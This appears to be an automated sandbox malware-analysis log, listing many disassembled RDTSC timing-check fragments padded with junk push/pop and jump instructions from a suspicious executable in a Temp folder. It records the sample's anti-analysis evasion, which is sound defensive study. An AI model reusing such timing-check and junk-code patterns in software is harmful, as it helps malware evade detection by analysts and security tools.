                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD91E0 second address: DD91EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jo 00007F3430D34976h 0x0000000c rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD91EC second address: DD91F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD933E second address: DD9344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD9344 second address: DD9348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DDDD20 second address: DDDD35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34980h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DDDFF5 second address: DDE010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 js 00007F3430D3ED36h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007F3430D3ED36h 0x00000015 jnp 00007F3430D3ED36h 0x0000001b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DDE010 second address: DDE014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DDE014 second address: DDE029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 jc 00007F3430D3ED48h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DDE029 second address: DDE02D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DDE784 second address: DDE788 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DDE788 second address: DDE792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DDE792 second address: DDE7EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F3430D3ED43h 0x00000011 jmp 00007F3430D3ED47h 0x00000016 jc 00007F3430D3ED36h 0x0000001c popad 0x0000001d popad 0x0000001e jc 00007F3430D3ED64h 0x00000024 push ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DDE7EB second address: DDE80A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3430D34984h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DDE80A second address: DDE810 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DDE9A1 second address: DDE9C3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3430D34988h 0x00000008 jne 00007F3430D34982h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DDE9C3 second address: DDE9C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DDEB14 second address: DDEB1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3430D34976h 0x0000000a popad 0x0000000b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DDEDD0 second address: DDEDD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DDEDD4 second address: DDEE1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34984h 0x00000007 jmp 00007F3430D3497Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F3430D34989h 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jnp 00007F3430D34976h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DE4C18 second address: DE4C22 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3430D3ED42h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DE4C22 second address: DE4C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F3430D34976h 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F3430D34976h 0x00000012 jng 00007F3430D34976h 0x00000018 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DE3712 second address: DE3729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F3430D3ED42h 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DE3B90 second address: DE3BBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F3430D34989h 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jng 00007F3430D34978h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DE3D1E second address: DE3D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3430D3ED41h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3430D3ED46h 0x00000011 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DE3D4C second address: DE3D65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3430D3497Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DE3D65 second address: DE3D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DE3D76 second address: DE3D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DE3D7A second address: DE3D8A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3430D3ED36h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DE3D8A second address: DE3D8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DE4378 second address: DE437C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DE32DC second address: DE32E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DE32E8 second address: DE32EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DE32EC second address: DE3311 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34983h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F3430D34982h 0x0000000f ja 00007F3430D34976h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DEF37B second address: DEF37F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DEF37F second address: DEF385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DEF50C second address: DEF52C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F3430D3ED42h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DF267A second address: DF267E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DF20E4 second address: DF20E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DF20E9 second address: DF2100 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F3430D34976h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d je 00007F3430D34976h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DF5C19 second address: DF5C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DF5C1D second address: DF5C21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DF5C21 second address: DF5C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F3430D3ED36h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DF5C31 second address: DF5C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DFBEC3 second address: DFBEC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DFBEC7 second address: DFBEDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3430D3497Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DFBEDE second address: DFBEE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DFA824 second address: DFA842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3430D34989h 0x00000009 popad 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DFAB11 second address: DFAB18 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DFAC82 second address: DFAC88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DFAC88 second address: DFAC92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F3430D3ED36h 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DFADFE second address: DFAE0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jne 00007F3430D34976h 0x0000000f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA9D65 second address: DA9DD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F3430D3ED38h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D2013h], eax 0x0000002d mov ebx, dword ptr [ebp+1248DCD0h] 0x00000033 xor edi, dword ptr [ebp+122D3009h] 0x00000039 add eax, ebx 0x0000003b jp 00007F3430D3ED4Fh 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 js 00007F3430D3ED38h 0x0000004a push ebx 0x0000004b pop ebx 0x0000004c rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA9DD0 second address: DA9E1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3497Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D1E45h], eax 0x00000012 push 00000004h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F3430D34978h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e xor edx, dword ptr [ebp+122D39C0h] 0x00000034 nop 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F3430D3497Ah 0x0000003c rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA9E1E second address: DA9E28 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3430D3ED3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E0098E second address: E0099F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F3430D3497Ch 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E0099F second address: E009A9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3430D3ED3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E0031B second address: E0031F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E0607A second address: E060D9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3430D3ED36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F3430D3ED4Ah 0x00000010 jl 00007F3430D3ED36h 0x00000016 jmp 00007F3430D3ED3Eh 0x0000001b popad 0x0000001c pushad 0x0000001d pushad 0x0000001e ja 00007F3430D3ED36h 0x00000024 pushad 0x00000025 popad 0x00000026 jmp 00007F3430D3ED43h 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 jmp 00007F3430D3ED48h 0x00000035 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E060D9 second address: E060F3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3430D34980h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E06516 second address: E0651A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E0651A second address: E06535 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34987h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E06535 second address: E0653D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E0653D second address: E06541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E06541 second address: E06560 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3430D3ED36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3430D3ED3Dh 0x00000011 jl 00007F3430D3ED36h 0x00000017 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E06820 second address: E0682B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F3430D34976h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E07166 second address: E0717F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3430D3ED41h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E0717F second address: E07187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E07187 second address: E0718D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E074CC second address: E074DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3430D34976h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F3430D34976h 0x00000013 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E077D5 second address: E077F4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F3430D3ED38h 0x0000000c popad 0x0000000d je 00007F3430D3ED62h 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007F3430D3ED36h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E077F4 second address: E077F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E077F8 second address: E077FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E0E269 second address: E0E26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E0D5EE second address: E0D606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3430D3ED42h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E0D765 second address: E0D76E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E0D8C3 second address: E0D8C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E0D8C7 second address: E0D8CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
